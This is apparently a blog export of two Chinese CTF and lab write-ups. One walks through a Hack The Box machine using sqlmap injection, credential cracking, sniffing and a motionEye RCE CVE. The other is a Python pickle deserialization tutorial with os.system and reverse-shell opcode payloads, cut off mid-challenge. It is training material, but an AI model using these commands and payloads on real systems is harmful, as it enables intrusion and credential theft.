[{"title":"hackthebox-CCTV靶场练习","url":"/2026/03/17/htb-0/","content":"\n## 一、信息收集\n\n这次选的是HTB的一个赛季靶场,难度为easy。\n\n![image-20260325194925158](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325194925158.png)\n\n拿到IP地址后先nmap扫一下:\n\n![image-20260325200223493](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325200223493.png)\n\n发现网站域名和开放的端口号,只开放了一个80和一个22,分别是web页面和ssh登录。\n\n点进网站看一下,直接ip点开网站打不开,需要在本机的域名解析中加上才可以,在/etc/hosts中加上域名解析:\n\n![image-20260325200802393](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325200802393.png)\n\n## 二、通过CVE拿到第一个shell\n\n然后点开网站即可打开:\n\n发现没什么东西,有个登录按钮,进去看一下\n\n![image-20260325200858375](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325200858375.png)\n\n发现是一个系统的登录页面:\n\n![image-20260325200952395](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325200952395.png)\n\n且没有验证码,理论上可以进行爆破登录。但是对于这种系统,先去搜一下有没有默认密码最快,发现这是一个视频监控软件,且有相应的默认密码admin:admin。尝试登录一下发现可以成功登入。\n\n![image-20260325200127913](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325200127913.png)\n\n点进去后发现是一个很大的系统,\n\n![image-20260325201228136](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325201228136.png)\n\n但是可以看到该系统的版本为1.37.63,既然如此最快速的方法还是去搜一下这个系统有没有CVE,有的话直接利用就好了,发现网上正好有该版本适用的CVE,是一个sql注入,那就先注入一下看看能拿到什么数据\n\n![image-20260325201702207](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325201702207.png)\n\n直接用poc显示没有认证,这时候想起来之前登录过,应该加上cookie才可以\n\n![image-20260325202018192](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325202018192.png)\n\n加上cookie后即可sql注入,发现注入点且给了payload\n\n![image-20260325202556730](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325202556730.png)\n\n之后就是常规的爆库爆表爆字段了,基本上就是运行sqlmap就好了:\n\n下面贴一下命令吧:\n\n```\n爆库名:\nsqlmap -u 'http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1' --cookie=\"ZMSESSID=bb2k6c68bbbqtt15c3ofouk3ci\" --dbs\n爆表名:\nsqlmap -u 'http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1' --cookie=\"ZMSESSID=bb2k6c68bbbqtt15c3ofouk3ci\" -D zm --tables\n爆列名:\nsqlmap -u 'http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1' --cookie=\"ZMSESSID=bb2k6c68bbbqtt15c3ofouk3ci\" -D zm -T Users --columns\n拿到用户名密码:\nsqlmap -u 'http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1' --cookie=\"ZMSESSID=bb2k6c68bbbqtt15c3ofouk3ci\" -D zm -T Users -C \"Password\" --where=\"Username='mark'\" --dump\n```\n\n最后拿到用户名和密码为:\n\n![image-20260325210123885](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325210123885.png)\n\n利用kali自带的密码爆破器john来爆破hash密码:\n\n![image-20260325210525397](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325210525397.png)\n\n最后爆破出账号密码为:mark:opensesame\n\n然后ssh登录,发现目录下没有flag,那可能就是这个服务器上有多个用户,还需要我们登录到其他用户来拿flag。\n\n![image-20260325210734831](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325210734831.png)\n\n看一下/etc/passwd,发现一些可疑账户,先记下来\n\n![image-20260325210853655](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325210853655.png)\n\n再看一下home目录,发现另一个用户,也就是确认了需要切换到这个用户。\n\n![image-20260325210942990](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325210942990.png)\n\n## 三、提权到其他用户\n\n然后就算切换到其他账户也需要提权,先下载linpeas这个脚本,简单讲一下这个脚本\n\n![image-20260325211638449](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325211638449.png)\n\n链接为[PEASS-ng/linPEAS/README.md at master · peass-ng/PEASS-ng · GitHub](https://github.com/peass-ng/PEASS-ng/blob/master/linPEAS/README.md)\n\n然后根据教程应该先下载到本地然后运行,但是拿到的shell连不了外网,只能通过kali这个机器来进行中转\n\n![image-20260325212324314](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325212324314.png)\n\n找到本地ip,然后wget一下并执行:\n\n然后即可下载完执行\n\n![image-20260325212434257](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325212434257.png)\n\n然后这个工具就会从多方面来帮我们找一些提取路径,其中会给一些高危可能点:\n\n![image-20260325213122267](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325213122267.png)\n\n还有端口情况:\n\n![image-20260325213202115](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325213202115.png)\n\n有一个命令可以suid执行,搜一下这个命令的提权方式,发现版本不符合\n\n![image-20260325213230780](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325213230780.png)\n\n![image-20260325213912270](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325213912270.png)\n\n只能放弃,再看看linpeas的其他输出,发现有一个server.log比较可疑\n\n![image-20260325213944420](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325213944420.png)\n\n看一下,很奇怪,这个用户一直在登录,每隔几秒就在登录,既然如此就可以直接嗅探一下网络包从而抓到他的账号密码:\n\n![image-20260325214123554](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325214123554.png)\n\n网上搜一下嗅探本地报文的命令,如下,找ai解释一下\n\n![image-20260325214240904](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325214240904.png)\n\n找到账号密码:sa_mark X1l9fx1ZjS7RZb\n\n![image-20260325215519433](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325215519433.png)\n\n然后去登录一下,拿到用户flag\n\n![image-20260325215724931](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325215724931.png)\n\n## 四、拿到ROOT权限\n\n紧接着想办法提权到root,这时候发现其他的都没什么思路,可以看一下端口信息\n\n![image-20260325222250361](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325222250361.png)\n\n确实新发现一下nmap扫不到的端口,这时候用nmap定点扫一下\n\n![image-20260325222200343](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325222200343.png)\n\n发现8765端口为http服务,则搭建一个隧道访问一下\n\n```ssh -L 8765:127.0.0.1:8765 mark@10.129.253.78```\n\n发现另一套系统\n\n![image-20260325222555347](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325222555347.png)\n\n查看一下前端代码,是否有一些指纹\n\n![image-20260325222640235](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325222640235.png)\n\n发现架构名称和版本号,为motionEye Version 0.43.1b4,搜一下这个版本的cve,发现可以rce的cve:\n\n[CVE-2025-60787 : None - 漏洞平台](https://cve.imfht.com/detail/CVE-2025-60787)\n\n然后就可以按照上面的路径直接进行漏洞利用即可:\n\n![image-20260325223337702](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325223337702.png)\n\n拿到root的shell\n\n![image-20260325223438408](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325223438408.png)\n\n## 五、后话\n\n后面回顾的时候发现上面的提权脚本也看了sudo的版本,发现这个版本刚好在前一段时间的sudo提权cve的影响范围内,所以实际上可以直接利用这个sudo提权到root,应该会更加方便一点。。\n\n![image-20260325223637449](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325223637449.png)\n\n![image-20260325223748009](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260325223748009.png)\n","tags":["OSCP","靶场渗透"],"categories":["OSCP"]},{"title":"DASCTF2024最后一战|寒夜破晓,冬至终章 const_python 题解及相关知识详解","url":"/2026/03/16/pickle1/","content":"\n# Pickle反序列化\n\n## 一、Pickle反序列化简述\n\n#### 1.1 什么是 Pickle\n\n`pickle` 是 Python 标准库中的一个模块,用于将 Python 对象序列化为字节流(Serialization),以及将字节流反序列化为 Python 对象(Deserialization)。\n\n- **序列化 (Dump)**:将对象转换为字节流,便于存储或网络传输。\n- **反序列化 (Load)**:将字节流还原为原始对象。\n\n**核心风险**:`pickle` 在反序列化时,并不是简单地重建数据,而是通过执行一系列操作码(Opcodes)来重建对象。如果攻击者能够控制输入的字节流,就可以构造恶意的操作码,让 Python 在反序列化过程中执行任意系统命令。\n\n下面是正常的序列化/反序列化过程\n\n```python\nimport pickle\n\n# 定义一个普通对象\ndata = {\"user\": \"admin\", \"role\": \"guest\"}\n\n# 序列化 (Dump)\nserialized_data = pickle.dumps(data)\nprint(f\"序列化后的字节流: {serialized_data}\")\n\n# 反序列化 (Load) - 正常情况\ndeserialized_data = pickle.loads(serialized_data)\nprint(f\"反序列化结果: {deserialized_data}\")\n```\n\n#### 1.2 pickle反序列化漏洞利用原理\n\n当 `pickle` 序列化一个对象时,如果该对象定义了 `__reduce__` 方法,`pickle` 会使用该方法返回的元组来决定如何重建对象。\n\n`__reduce__` 返回的元组格式通常为:`(callable, args)`。\n\n- `callable`: 要调用的函数(例如 `os.system`)。\n- `args`: 传递给函数的参数元组(例如 `('whoami',)`)。\n\n因此我们可以利用 `__reduce__` 魔术方法来构造恶意对象,比如下面的示例,可以使得`pickle`在反序列化的时候执行指令whoami\n\n```python\nimport pickle\nimport os\n\nclass Exploit:\n def __reduce__(self):\n # 返回一个元组:(要执行的函数, 参数元组)\n # 这里指示 pickle 执行 os.system('whoami')\n return (os.system, ('whoami',))\n\n# 生成恶意 payload,创建一个类实例\nevil_object = Exploit()\n# 将类实例序列化为字节码\nevil_bytes = pickle.dumps(evil_object)\n\nprint(\"恶意 Payload (Hex):\", evil_bytes.hex())\nprint(\"恶意 Payload (Raw):\", evil_bytes)\n\nprint(\"\\n正在执行反序列化...\")\n\npickle.loads(evil_bytes)\n```\n\n上面就是正常的pickle反序列化的脚本构造方法\n\n#### 1.3 pickle反序列化字节码学习\n\n下面是一些常见的字节码,什么是字节码,其实就是pickle序列化出的字符串就是各种字节码的组合,可以将上面函数里的reduce内的一些操作变成字节码,类似于一种汇编代码\n\n| opcode | 描述 | 具体写法 | 栈上的变化 | memo上的变化 |\n| ------ | ------------------------------------------------------------ | -------------------------------------------------- | ------------------------------------------------------------ | ------------ |\n| c | 获取一个全局对象或import一个模块(注:会调用import语句,能够引入新的包) | c[module]\\n[instance]\\n | 获得的对象入栈 | 无 |\n| o | 寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象) | o | 这个过程中涉及到的数据都出栈,函数的返回值(或生成的对象)入栈 | 无 |\n| i | 相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象) | i[module]\\n[callable]\\n | 这个过程中涉及到的数据都出栈,函数返回值(或生成的对象)入栈 | 无 |\n| N | 实例化一个None | N | 获得的对象入栈 | 无 |\n| S | 实例化一个字符串对象 | S'xxx'\\n(也可以使用双引号、\\'等python字符串形式) | 获得的对象入栈 | 无 |\n| V | 实例化一个UNICODE字符串对象 | Vxxx\\n | 获得的对象入栈 | 无 |\n| I | 实例化一个int对象 | Ixxx\\n | 获得的对象入栈 | 无 |\n| F | 实例化一个float对象 | Fx.x\\n | 获得的对象入栈 | 无 |\n| R | 选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数 | R | 函数和参数出栈,函数的返回值入栈 | 无 |\n| . | 程序结束,栈顶的一个元素作为pickle.loads()的返回值 | . | 无 | 无 |\n| ( | 向栈中压入一个MARK标记 | ( | MARK标记入栈 | 无 |\n| t | 寻找栈中的上一个MARK,并组合之间的数据为元组 | t | MARK标记以及被组合的数据出栈,获得的对象入栈 | 无 |\n| ) | 向栈中直接压入一个空元组 | ) | 空元组入栈 | 无 |\n| l | 寻找栈中的上一个MARK,并组合之间的数据为列表 | l | MARK标记以及被组合的数据出栈,获得的对象入栈 | 无 |\n| ] | 向栈中直接压入一个空列表 | ] | 空列表入栈 | 无 |\n| d | 寻找栈中的上一个MARK,并组合之间的数据为字典(数据必须有偶数个,即呈key-value对) | d | MARK标记以及被组合的数据出栈,获得的对象入栈 | 无 |\n| } | 向栈中直接压入一个空字典 | } | 空字典入栈 | 无 |\n| p | 将栈顶对象储存至memo_n | pn\\n | 无 | 对象被储存 |\n| g | 将memo_n的对象压栈 | gn\\n | 对象被压栈 | 无 |\n| 0 | 丢弃栈顶对象 | 0 | 栈顶对象被丢弃 | 无 |\n| b | 使用栈中的第一个元素(储存多个属性名: 属性值的字典)对第二个元素(对象实例)进行属性设置 | b | 栈上第一个元素出栈 | 无 |\n| s | 将栈的第一个和第二个对象作为key-value对,添加或更新到栈的第三个对象(必须为列表或字典,列表以数字作为key)中 | s | 第一、二个元素出栈,第三个元素(列表或字典)添加新值或被更新 | 无 |\n| u | 寻找栈中的上一个MARK,组合之间的数据(数据必须有偶数个,即呈key-value对)并全部添加或更新到该MARK之前的一个元素(必须为字典)中 | u | MARK标记以及被组合的数据出栈,字典被更新 | 无 |\n| a | 将栈的第一个元素append到第二个元素(列表)中 | a | 栈顶元素出栈,第二个元素(列表)被更新 | 无 |\n\n最终的效果如下,也就是一种高级构造方法,但是也很难学习,类似于让人手写汇编,对于一些难度较大的题目来说,还是直接构造opcode更好:\n\n```\nopcode = b'''csubprocess\n run\n p0\n ((lp1\n Vbash\n p2\n aV-c\n p3\n aVbash -i >& /dev/tcp/ip/port 0>&1\n p4\n atp5\n Rp6.\n '''\n```\n\n#### 1.4 Pker学习\n\n简介\n\n- pker是由@eddieivan01编写的以仿照Python的形式产生pickle opcode的解析器,可以在https://github.com/eddieivan01/pker下载源码。\n- 使用pker,我们可以更方便地编写pickle opcode(生成pickle版本0的opcode)。\n- 再次建议,在能够手写opcode的情况下使用pker进行辅助编写,不要过分依赖pker。\n\n下面以一个例子来进行介绍:\n\n```\ngetattr = GLOBAL('builtins', 'getattr') # 从内置函数中获取 getattr 这个内置函数 类似import builtins,然后获取到其中的getattr这个函数\nopen = GLOBAL('builtins', 'open') # 同样,我们获取到 open 这个内置函数\nf = open('/flag') # 利用获取到的open函数拿到 flag 的文件对象\nread = getattr(f, 'read') # 注意,这个地方的 read 是独属于 f 文件对象的 read,相当于 read = f.read\ncontent = read() # 获取到 flag 的内容\nsrc = open('./app.py', 'w') # 获取到源代码的文件对象,这是我们唯一一个我们能拿到回显的地方了\nwrite = getattr(src, 'write') # 拿到源代码的 write 函数\nwrite(content) # 写入\nreturn # 返回\n```\n\n然后将上面的内容保存为文件,输入到pker中,类似如下:\n\n```\npython pker.py < 1.txt\n```\n\n即可将对应picker序列化的字节码输出,是一种很方便的构造pickle反序列化字节码的方式,值得学习一下。\n\n当然实际用法还有很多,这里就不过多讲解了,下面以一道题目为例\n\n## 二、 DASCTF 2024 web const_python\n\n#### 2.1 题目介绍和思路\n\n这是一道python pickle反序列化题目,查看题目描述显示/src下有源码,打开即可获得源码,并且告诉了flag的位置\n\n![image-20260316205527031](https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/image-20260316205527031.png)\n\n\n\n```python\n\nimport builtins\nimport io\nimport sys\nimport uuid\nfrom flask import Flask, request,jsonify,session\nimport pickle\nimport base64\n\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = str(uuid.uuid4()).replace(\"-\", \"\")\n\n\nclass User:\n def __init__(self, username, password, auth='ctfer'):\n self.username = username\n self.password = password\n self.auth = auth\n\npassword = str(uuid.uuid4()).replace(\"-\", \"\")\nAdmin = User('admin', password,\"admin\")\n\n@app.route('/')\ndef index():\n return \"Welcome to my application\"\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef post_login():\n if request.method == 'POST':\n\n username = request.form['username']\n password = request.form['password']\n\n\n if username == 'admin' :\n if password == admin.password:\n session['username'] = \"admin\"\n return \"Welcome Admin\"\n else:\n return \"Invalid Credentials\"\n else:\n session['username'] = username\n\n\n return '''\n
\n